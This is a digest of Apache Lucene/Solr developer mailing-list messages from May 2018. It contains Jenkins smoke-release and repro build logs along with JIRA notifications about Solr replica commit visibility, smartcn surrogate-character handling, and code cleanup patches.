: [loadresource] Do not set property disallowed.ivy.jars.list as its length is 
0.
: 
: -ivy-fail-disallowed-ivy-version:
: 
: ivy-fail:
: 
: ivy-configure:
: [ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/lucene/top-level-ivy-settings.xml
: 
: resolve:
: 
: ivy-availability-check:
: [loadresource] Do not set property disallowed.ivy.jars.list as its length is 
0.
: 
: -ivy-fail-disallowed-ivy-version:
: 
: ivy-fail:
: 
: ivy-configure:
: [ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/lucene/top-level-ivy-settings.xml
: 
: resolve:
: 
: ivy-availability-check:
: [loadresource] Do not set property disallowed.ivy.jars.list as its length is 
0.
: 
: -ivy-fail-disallowed-ivy-version:
: 
: ivy-fail:
: 
: ivy-configure:
: [ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/lucene/top-level-ivy-settings.xml
: 
: resolve:
: 
: ivy-availability-check:
: [loadresource] Do not set property disallowed.ivy.jars.list as its length is 
0.
: 
: -

[jira] [Commented] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Nguyen Nguyen (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16483433#comment-16483433
 ] 

Nguyen Nguyen commented on SOLR-12382:
--

Thanks everyone!!

> new data not seen immediately after commit() on SolrCloud collection with 
> only TLOG and PULL replicas
> -
>
> Key: SOLR-12382
> URL: https://issues.apache.org/jira/browse/SOLR-12382
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Affects Versions: 7.3
> Environment: SolrCloud on Amazon Linux AMI 2018.03
>  
>Reporter: Nguyen Nguyen
>Priority: Major
>
> On collection with TLOG/PULL replicas, queries that follow right after 
> commit(waitSearch:true) would NOT return newly added data until several 
> seconds later.
> Tested same scenario on another collection with only NRT replicas and found 
> that it behaved as expected (query returned newly added data right after 
> commit(waitSearch:true) was called.
> 7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica
> Commit settings
>  
>   15000 
>   false 
> 
>  
>   -1 
> 



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Updated] (SOLR-12366) Avoid SlowAtomicReader.getLiveDocs -- it's slow

2018-05-21 Thread David Smiley (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12366?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

David Smiley updated SOLR-12366:

Attachment: SOLR-12366.patch

> Avoid SlowAtomicReader.getLiveDocs -- it's slow
> ---
>
> Key: SOLR-12366
> URL: https://issues.apache.org/jira/browse/SOLR-12366
> Project: Solr
>  Issue Type: Improvement
>  Security Level: Public(Default Security Level. Issues are Public) 
>  Components: search
>Reporter: David Smiley
>Assignee: David Smiley
>Priority: Major
> Attachments: SOLR-12366.patch, SOLR-12366.patch, SOLR-12366.patch
>
>
> SlowAtomicReader is of course slow, and it's getLiveDocs (based on MultiBits) 
> is slow as it uses a binary search for each lookup.  There are various places 
> in Solr that use SolrIndexSearcher.getSlowAtomicReader and then get the 
> liveDocs.  Most of these places ought to work with SolrIndexSearcher's 
> getLiveDocs method.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Updated] (SOLR-12337) Remove QueryWrapperFilter

2018-05-21 Thread David Smiley (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12337?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

David Smiley updated SOLR-12337:

Attachment: SOLR-12337.patch

> Remove QueryWrapperFilter
> -
>
> Key: SOLR-12337
> URL: https://issues.apache.org/jira/browse/SOLR-12337
> Project: Solr
>  Issue Type: Sub-task
>  Security Level: Public(Default Security Level. Issues are Public) 
>Reporter: David Smiley
>Assignee: David Smiley
>Priority: Major
> Attachments: SOLR-12337.patch, SOLR-12337.patch
>
>
> QueryWrapperFilter has not been needed ever since Filter was changed to 
> extend Query -- LUCENE-1518.  It was retained because there was at least one 
> place in Lucene that had a Filter/Query distinction, but it was forgotten 
> when Filter moved to Solr.  It contains some code that creates a temporary 
> IndexSearcher but forgets to null out the cache on it, and so 
> QueryWrapperFilter can add non-trivial overhead.  We should simply remove it 
> altogether.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[JENKINS] Lucene-Solr-SmokeRelease-master - Build # 1029 - Still Failing

2018-05-21 Thread Apache Jenkins Server
Build: https://builds.apache.org/job/Lucene-Solr-SmokeRelease-master/1029/

No tests ran.

Build Log:
[...truncated 24174 lines...]
[asciidoctor:convert] asciidoctor: ERROR: about-this-guide.adoc: line 1: 
invalid part, must have at least one section (e.g., chapter, appendix, etc.)
[asciidoctor:convert] asciidoctor: ERROR: solr-glossary.adoc: line 1: invalid 
part, must have at least one section (e.g., chapter, appendix, etc.)
 [java] Processed 2212 links (1766 relative) to 3083 anchors in 245 files
 [echo] Validated Links & Anchors via: 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/solr/build/solr-ref-guide/bare-bones-html/

-dist-changes:
 [copy] Copying 4 files to 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/solr/package/changes

-dist-keys:
  [get] Getting: http://home.apache.org/keys/group/lucene.asc
  [get] To: 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/solr/package/KEYS

package:

-unpack-solr-tgz:

-ensure-solr-tgz-exists:
[mkdir] Created dir: 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/solr/build/solr.tgz.unpacked
[untar] Expanding: 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/solr/package/solr-8.0.0.tgz
 into 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/solr/build/solr.tgz.unpacked

generate-maven-artifacts:

resolve:

resolve:

ivy-availability-check:
[loadresource] Do not set property disallowed.ivy.jars.list as its length is 0.

-ivy-fail-disallowed-ivy-version:

ivy-fail:

ivy-configure:
[ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/lucene/top-level-ivy-settings.xml

resolve:

ivy-availability-check:
[loadresource] Do not set property disallowed.ivy.jars.list as its length is 0.

-ivy-fail-disallowed-ivy-version:

ivy-fail:

ivy-configure:
[ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/lucene/top-level-ivy-settings.xml

resolve:

resolve:

ivy-availability-check:
[loadresource] Do not set property disallowed.ivy.jars.list as its length is 0.

-ivy-fail-disallowed-ivy-version:

ivy-fail:

ivy-configure:
[ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/lucene/top-level-ivy-settings.xml

resolve:

ivy-availability-check:
[loadresource] Do not set property disallowed.ivy.jars.list as its length is 0.

-ivy-fail-disallowed-ivy-version:

ivy-fail:

ivy-configure:
[ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/lucene/top-level-ivy-settings.xml

resolve:

ivy-availability-check:
[loadresource] Do not set property disallowed.ivy.jars.list as its length is 0.

-ivy-fail-disallowed-ivy-version:

ivy-fail:

ivy-configure:
[ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/lucene/top-level-ivy-settings.xml

resolve:

ivy-availability-check:
[loadresource] Do not set property disallowed.ivy.jars.list as its length is 0.

-ivy-fail-disallowed-ivy-version:

ivy-fail:

ivy-configure:
[ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/lucene/top-level-ivy-settings.xml

resolve:

ivy-availability-check:
[loadresource] Do not set property disallowed.ivy.jars.list as its length is 0.

-ivy-fail-disallowed-ivy-version:

ivy-fail:

ivy-configure:
[ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/lucene/top-level-ivy-settings.xml

resolve:

ivy-availability-check:
[loadresource] Do not set property disallowed.ivy.jars.list as its length is 0.

-ivy-fail-disallowed-ivy-version:

ivy-fail:

ivy-configure:
[ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/lucene/top-level-ivy-settings.xml

resolve:

ivy-availability-check:
[loadresource] Do not set property disallowed.ivy.jars.list as its length is 0.

-ivy-fail-disallowed-ivy-version:

ivy-fail:

ivy-configure:
[ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/lucene/top-level-ivy-settings.xml

resolve:

ivy-availability-check:
[loadresource] Do not set property disallowed.ivy.jars.list as its length is 0.

-ivy-fail-disallowed-ivy-version:

ivy-fail:

ivy-configure:
[ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/lucene/top-level-ivy-settings.xml

resolve:

ivy-availability-check:
[loadresource] Do not set property disallowed.ivy.jars.list as its length is 0.

-ivy-fail-disallowed-ivy-version:

ivy-fail:

ivy-configure:
[ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-S

[jira] [Commented] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Cao Manh Dat (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16483416#comment-16483416
 ] 

Cao Manh Dat commented on SOLR-12382:
-

bq. Right, I believe that is the idea - they catch up when they end up polling. 
So I assume this is all by design. Would be nice to at least optionally get the 
behavior of waiting until replicas are up to date before return from a commit 
w/ waitSearcher=true.
(y) Totally correct, nothing more need to be explained here.

> new data not seen immediately after commit() on SolrCloud collection with 
> only TLOG and PULL replicas
> -
>
> Key: SOLR-12382
> URL: https://issues.apache.org/jira/browse/SOLR-12382
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Affects Versions: 7.3
> Environment: SolrCloud on Amazon Linux AMI 2018.03
>  
>Reporter: Nguyen Nguyen
>Priority: Major
>
> On collection with TLOG/PULL replicas, queries that follow right after 
> commit(waitSearch:true) would NOT return newly added data until several 
> seconds later.
> Tested same scenario on another collection with only NRT replicas and found 
> that it behaved as expected (query returned newly added data right after 
> commit(waitSearch:true) was called.
> 7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica
> Commit settings
>  
>   15000 
>   false 
> 
>  
>   -1 
> 



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Updated] (LUCENE-8325) smartcn analyzer can't handle SURROGATE char

2018-05-21 Thread chengpohi (JIRA)

 [ 
https://issues.apache.org/jira/browse/LUCENE-8325?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

chengpohi updated LUCENE-8325:
--
Description: 
This issue is from [https://github.com/elastic/elasticsearch/issues/30739]

smartcn analyzer can't handle SURROGATE char, Example:

 

 
{code:java}
Analyzer ca = new SmartChineseAnalyzer(); 
String sentence = "\uD862\uDE0F"; // 𨨏 a surrogate char 
TokenStream tokenStream = ca.tokenStream("", sentence); 
CharTermAttribute charTermAttribute = 
tokenStream.addAttribute(CharTermAttribute.class); 
tokenStream.reset(); 
while (tokenStream.incrementToken()) { 
String term = charTermAttribute.toString(); 
System.out.println(term); 
} 
{code}
 

In the above code snippet will output: 

 
{code:java}
? 
? 
{code}
 

 and I have created a *PATCH* to try to fix this, please help review(since 
*smartcn* only support *GBK* char, so it's only just handle it as a *single 
char*).

  was:
This issue is from [https://github.com/elastic/elasticsearch/issues/30739]

smartcn analyzer can't handle SURROGATE char, Example:

 

 
{code:java}
Analyzer ca = new SmartChineseAnalyzer(); 
String sentence = "\uD862\uDE0F"; // 𨨏 a surrogate char 
TokenStream tokenStream = ca.tokenStream("", sentence); 
CharTermAttribute charTermAttribute = 
tokenStream.addAttribute(CharTermAttribute.class); 
tokenStream.reset(); 
while (tokenStream.incrementToken()) { 
String term = charTermAttribute.toString(); 
System.out.println(term); 
} 
{code}
 

In the above code snippet will output: 

 
{code:java}
? 
? 
{code}
 

 and I have created a **PATCH** to try to fix this.


> smartcn analyzer can't handle SURROGATE char
> 
>
> Key: LUCENE-8325
> URL: https://issues.apache.org/jira/browse/LUCENE-8325
> Project: Lucene - Core
>  Issue Type: Bug
>Reporter: chengpohi
>Priority: Minor
>  Labels: newbie, patch
> Attachments: handle-surrogate-char-for-smartcn.patch
>
>
> This issue is from [https://github.com/elastic/elasticsearch/issues/30739]
> smartcn analyzer can't handle SURROGATE char, Example:
>  
>  
> {code:java}
> Analyzer ca = new SmartChineseAnalyzer(); 
> String sentence = "\uD862\uDE0F"; // 𨨏 a surrogate char 
> TokenStream tokenStream = ca.tokenStream("", sentence); 
> CharTermAttribute charTermAttribute = 
> tokenStream.addAttribute(CharTermAttribute.class); 
> tokenStream.reset(); 
> while (tokenStream.incrementToken()) { 
> String term = charTermAttribute.toString(); 
> System.out.println(term); 
> } 
> {code}
>  
> In the above code snippet will output: 
>  
> {code:java}
> ? 
> ? 
> {code}
>  
>  and I have created a *PATCH* to try to fix this, please help review(since 
> *smartcn* only support *GBK* char, so it's only just handle it as a *single 
> char*).



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Updated] (LUCENE-8325) smartcn analyzer can't handle SURROGATE char

2018-05-21 Thread chengpohi (JIRA)

 [ 
https://issues.apache.org/jira/browse/LUCENE-8325?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

chengpohi updated LUCENE-8325:
--
Description: 
This issue is from [https://github.com/elastic/elasticsearch/issues/30739]

smartcn analyzer can't handle SURROGATE char, Example:

 

 
{code:java}
Analyzer ca = new SmartChineseAnalyzer(); 
String sentence = "\uD862\uDE0F"; // 𨨏 a surrogate char 
TokenStream tokenStream = ca.tokenStream("", sentence); 
CharTermAttribute charTermAttribute = 
tokenStream.addAttribute(CharTermAttribute.class); 
tokenStream.reset(); 
while (tokenStream.incrementToken()) { 
String term = charTermAttribute.toString(); 
System.out.println(term); 
} 
{code}
 

In the above code snippet will output: 

 
{code:java}
? 
? 
{code}
 

 and I have created a **PATCH** to try to fix this.

  was:
This issue is from [smartcn_tokenizer 
...](https://github.com/elastic/elasticsearch/issues/30739)

smartcn analyzer can't handle SURROGATE char, Example:

 

 
{code:java}
Analyzer ca = new SmartChineseAnalyzer(); 
String sentence = "\uD862\uDE0F"; // 𨨏 a surrogate char 
TokenStream tokenStream = ca.tokenStream("", sentence); 
CharTermAttribute charTermAttribute = 
tokenStream.addAttribute(CharTermAttribute.class); 
tokenStream.reset(); 
while (tokenStream.incrementToken()) { 
String term = charTermAttribute.toString(); 
System.out.println(term); 
} 
{code}
 

In the above code snippet will output: 

 
{code:java}
? 
? 
{code}
 

 


> smartcn analyzer can't handle SURROGATE char
> 
>
> Key: LUCENE-8325
> URL: https://issues.apache.org/jira/browse/LUCENE-8325
> Project: Lucene - Core
>  Issue Type: Bug
>Reporter: chengpohi
>Priority: Minor
>  Labels: newbie, patch
> Attachments: handle-surrogate-char-for-smartcn.patch
>
>
> This issue is from [https://github.com/elastic/elasticsearch/issues/30739]
> smartcn analyzer can't handle SURROGATE char, Example:
>  
>  
> {code:java}
> Analyzer ca = new SmartChineseAnalyzer(); 
> String sentence = "\uD862\uDE0F"; // 𨨏 a surrogate char 
> TokenStream tokenStream = ca.tokenStream("", sentence); 
> CharTermAttribute charTermAttribute = 
> tokenStream.addAttribute(CharTermAttribute.class); 
> tokenStream.reset(); 
> while (tokenStream.incrementToken()) { 
> String term = charTermAttribute.toString(); 
> System.out.println(term); 
> } 
> {code}
>  
> In the above code snippet will output: 
>  
> {code:java}
> ? 
> ? 
> {code}
>  
>  and I have created a **PATCH** to try to fix this.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Created] (LUCENE-8325) smartcn analyzer can't handle SURROGATE char

2018-05-21 Thread chengpohi (JIRA)
chengpohi created LUCENE-8325:
-

 Summary: smartcn analyzer can't handle SURROGATE char
 Key: LUCENE-8325
 URL: https://issues.apache.org/jira/browse/LUCENE-8325
 Project: Lucene - Core
  Issue Type: Bug
Reporter: chengpohi
 Attachments: handle-surrogate-char-for-smartcn.patch

This issue is from [smartcn_tokenizer 
...](https://github.com/elastic/elasticsearch/issues/30739)

smartcn analyzer can't handle SURROGATE char, Example:

 

 
{code:java}
Analyzer ca = new SmartChineseAnalyzer(); 
String sentence = "\uD862\uDE0F"; // 𨨏 a surrogate char 
TokenStream tokenStream = ca.tokenStream("", sentence); 
CharTermAttribute charTermAttribute = 
tokenStream.addAttribute(CharTermAttribute.class); 
tokenStream.reset(); 
while (tokenStream.incrementToken()) { 
String term = charTermAttribute.toString(); 
System.out.println(term); 
} 
{code}
 

In the above code snippet will output: 

 
{code:java}
? 
? 
{code}
 

 



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[JENKINS] Lucene-Solr-repro - Build # 675 - Unstable

2018-05-21 Thread Apache Jenkins Server
Build: https://builds.apache.org/job/Lucene-Solr-repro/675/

[...truncated 39 lines...]
[repro] Jenkins log URL: 
https://builds.apache.org/job/Lucene-Solr-Tests-master/2539/consoleText

[repro] Revision: 93926e9c83a9b4e9d52182654befae9d56191911

[repro] Repro line:  ant test  -Dtestcase=NodeAddedTriggerTest 
-Dtests.method=testRestoreState -Dtests.seed=860FB951B6B7BD4C 
-Dtests.multiplier=2 -Dtests.slow=true -Dtests.locale=vi-VN 
-Dtests.timezone=Antarctica/McMurdo -Dtests.asserts=true 
-Dtests.file.encoding=UTF-8

[repro] Repro line:  ant test  -Dtestcase=SoftAutoCommitTest 
-Dtests.method=testSoftCommitWithinAndHardCommitMaxTimeMixedAdds 
-Dtests.seed=860FB951B6B7BD4C -Dtests.multiplier=2 -Dtests.slow=true 
-Dtests.locale=lt-LT -Dtests.timezone=America/Managua -Dtests.asserts=true 
-Dtests.file.encoding=UTF-8

[repro] Repro line:  ant test  -Dtestcase=IndexSizeTriggerTest 
-Dtests.method=testMergeIntegration -Dtests.seed=860FB951B6B7BD4C 
-Dtests.multiplier=2 -Dtests.slow=true -Dtests.locale=es-AR 
-Dtests.timezone=America/Indiana/Petersburg -Dtests.asserts=true 
-Dtests.file.encoding=UTF-8

[repro] git rev-parse --abbrev-ref HEAD
[repro] git rev-parse HEAD
[repro] Initial local git branch/revision: 
0bf1eae92c4117659e2608111a8d64294009cc98
[repro] git fetch

[...truncated 2 lines...]
[repro] git checkout 93926e9c83a9b4e9d52182654befae9d56191911

[...truncated 2 lines...]
[repro] git merge --ff-only

[...truncated 1 lines...]
[repro] ant clean

[...truncated 6 lines...]
[repro] Test suites by module:
[repro]solr/core
[repro]   IndexSizeTriggerTest
[repro]   SoftAutoCommitTest
[repro]   NodeAddedTriggerTest
[repro] ant compile-test

[...truncated 3298 lines...]
[repro] ant test-nocompile -Dtests.dups=5 -Dtests.maxfailures=15 
-Dtests.class="*.IndexSizeTriggerTest|*.SoftAutoCommitTest|*.NodeAddedTriggerTest"
 -Dtests.showOutput=onerror  -Dtests.seed=860FB951B6B7BD4C -Dtests.multiplier=2 
-Dtests.slow=true -Dtests.locale=es-AR 
-Dtests.timezone=America/Indiana/Petersburg -Dtests.asserts=true 
-Dtests.file.encoding=UTF-8

[...truncated 4355 lines...]
[repro] Setting last failure code to 256

[repro] Failures:
[repro]   0/5 failed: org.apache.solr.update.SoftAutoCommitTest
[repro]   2/5 failed: org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest
[repro]   3/5 failed: org.apache.solr.cloud.autoscaling.NodeAddedTriggerTest
[repro] git checkout 0bf1eae92c4117659e2608111a8d64294009cc98

[...truncated 2 lines...]
[repro] Exiting with code 256

[...truncated 6 lines...]

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Mark Miller (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16483203#comment-16483203
 ] 

Mark Miller commented on SOLR-12382:


Right, I believe that is the idea - they catch up when they end up polling. So 
I assume this is all by design. Would be nice to at least optionally get the 
behavior of waiting until replicas are up to date before return from a commit 
w/ waitSearcher=true.

> new data not seen immediately after commit() on SolrCloud collection with 
> only TLOG and PULL replicas
> -
>
> Key: SOLR-12382
> URL: https://issues.apache.org/jira/browse/SOLR-12382
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Affects Versions: 7.3
> Environment: SolrCloud on Amazon Linux AMI 2018.03
>  
>Reporter: Nguyen Nguyen
>Priority: Major
>
> On collection with TLOG/PULL replicas, queries that follow right after 
> commit(waitSearch:true) would NOT return newly added data until several 
> seconds later.
> Tested same scenario on another collection with only NRT replicas and found 
> that it behaved as expected (query returned newly added data right after 
> commit(waitSearch:true) was called.
> 7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica
> Commit settings
>  
>   15000 
>   false 
> 
>  
>   -1 
> 



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Shawn Heisey (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16483190#comment-16483190
 ] 

Shawn Heisey commented on SOLR-12382:
-

There is another possibility.  If this is how TLOG/PULL work, then it would 
happen even if your commits are hard commits.  Perhaps somebody who's familiar 
with the implementation can say whether this is possible.

If replication to TLOG and PULL replicas happens on a polling interval (like 
master/slave for non-cloud setups) rather than being triggered on every index 
change, then the other replicas would not see changes immediately.


> new data not seen immediately after commit() on SolrCloud collection with 
> only TLOG and PULL replicas
> -
>
> Key: SOLR-12382
> URL: https://issues.apache.org/jira/browse/SOLR-12382
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Affects Versions: 7.3
> Environment: SolrCloud on Amazon Linux AMI 2018.03
>  
>Reporter: Nguyen Nguyen
>Priority: Major
>
> On collection with TLOG/PULL replicas, queries that follow right after 
> commit(waitSearch:true) would NOT return newly added data until several 
> seconds later.
> Tested same scenario on another collection with only NRT replicas and found 
> that it behaved as expected (query returned newly added data right after 
> commit(waitSearch:true) was called.
> 7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica
> Commit settings
>  
>   15000 
>   false 
> 
>  
>   -1 
> 



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-9480) Graph Traversal for Significantly Related Terms (Semantic Knowledge Graph)

2018-05-21 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-9480?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16483191#comment-16483191
 ] 

ASF subversion and git services commented on SOLR-9480:
---

Commit 0bf1eae92c4117659e2608111a8d64294009cc98 in lucene-solr's branch 
refs/heads/master from Chris Hostetter
[ https://git-wip-us.apache.org/repos/asf?p=lucene-solr.git;h=0bf1eae ]

SOLR-9480 followup: remove/abstract deprecated implementations on master


> Graph Traversal for Significantly Related Terms (Semantic Knowledge Graph)
> --
>
> Key: SOLR-9480
> URL: https://issues.apache.org/jira/browse/SOLR-9480
> Project: Solr
>  Issue Type: Improvement
>  Security Level: Public(Default Security Level. Issues are Public) 
>Reporter: Trey Grainger
>Assignee: Hoss Man
>Priority: Major
> Attachments: SOLR-9480.patch, SOLR-9480.patch, SOLR-9480.patch, 
> SOLR-9480.patch, SOLR-9480.patch, SOLR-9480.patch
>
>
> This issue is to track the contribution of the Semantic Knowledge Graph Solr 
> Plugin (request handler), which exposes a graph-like interface for 
> discovering and traversing significant relationships between entities within 
> an inverted index.
> This data model has been described in the following research paper: [The 
> Semantic Knowledge Graph: A compact, auto-generated model for real-time 
> traversal and ranking of any relationship within a 
> domain|https://arxiv.org/abs/1609.00464], as well as in presentations I gave 
> in October 2015 at [Lucene/Solr 
> Revolution|http://www.slideshare.net/treygrainger/leveraging-lucenesolr-as-a-knowledge-graph-and-intent-engine]
>  and November 2015 at the [Bay Area Search 
> Meetup|http://www.treygrainger.com/posts/presentations/searching-on-intent-knowledge-graphs-personalization-and-contextual-disambiguation/].
> The source code for this project is currently available at 
> [https://github.com/careerbuilder/semantic-knowledge-graph], and the folks at 
> CareerBuilder (where this was built) have given me the go-ahead to now 
> contribute this back to the Apache Solr Project, as well.
> Check out the Github repository, research paper, or presentations for a more 
> detailed description of this contribution. Initial patch coming soon.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Mark Miller (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16483188#comment-16483188
 ] 

Mark Miller commented on SOLR-12382:


Whoever added the feature will be able to comment better, but from what I have 
seen, non leader replicas skip any commit with tlog mode - and only in tests, 
rather then just returning on commit, there is an assert that tries to wait 
until the replica appears to be in sync with the leader.

Pull replicas also seem to just skip any commit on replicas and log a warning - 
they don't have the test wait code. In both cases, I don't see how 
waitSearcher=true would affect anything on the replica side unless somehow it's 
handled in some strange other place. AFAICT it would only wait for the leader 
to open the new searcher.

> new data not seen immediately after commit() on SolrCloud collection with 
> only TLOG and PULL replicas
> -
>
> Key: SOLR-12382
> URL: https://issues.apache.org/jira/browse/SOLR-12382
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Affects Versions: 7.3
> Environment: SolrCloud on Amazon Linux AMI 2018.03
>  
>Reporter: Nguyen Nguyen
>Priority: Major
>
> On collection with TLOG/PULL replicas, queries that follow right after 
> commit(waitSearch:true) would NOT return newly added data until several 
> seconds later.
> Tested same scenario on another collection with only NRT replicas and found 
> that it behaved as expected (query returned newly added data right after 
> commit(waitSearch:true) was called.
> 7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica
> Commit settings
>  
>   15000 
>   false 
> 
>  
>   -1 
> 



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Comment Edited] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Shawn Heisey (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16483184#comment-16483184
 ] 

Shawn Heisey edited comment on SOLR-12382 at 5/21/18 11:10 PM:
---

We do have documentation that says NRT replica types are the only kind that 
support soft commits.

https://lucene.apache.org/solr/guide/7_3/shards-and-indexing-data-in-solrcloud.html#all-nrt-replicas

If your code is doing a soft commit, then this is what's happening:

 * Changes are indexed.
 * A soft commit is called.
 * The leader does the commit, but only into memory.  That change is NOT 
replicated to the other replicas, because TLOG and PULL replicas copy the 
on-disk index.
 * Your first query is made.  It gets load balanced by the cluster to a replica 
other than the leader.
 * Within 15 seconds (your autoCommit interval), a hard commit is fired, 
flushing all segments to disk.  At this point, the changes to the index will be 
on disk, so they are replicated.  When a TLOG or PULL replica has its index 
change, it will open a new searcher.
 * A query made after the other replicas successfully open a new searcher will 
see the change, no matter which replica it is sent to.

The solution to this is to use only hard commits, or stick with NRT replicas.



was (Author: elyograg):
We do have documentation that says NRT replica types are the only kind that 
support soft commits.

https://lucene.apache.org/solr/guide/7_3/shards-and-indexing-data-in-solrcloud.html#all-nrt-replicas

If your code is doing a soft commit, then this is what's happening:

 * Changes are indexed.
 * A soft commit is called.
 * The leader does the commit, but only into memory.  That change is NOT 
replicated to the other replicas.
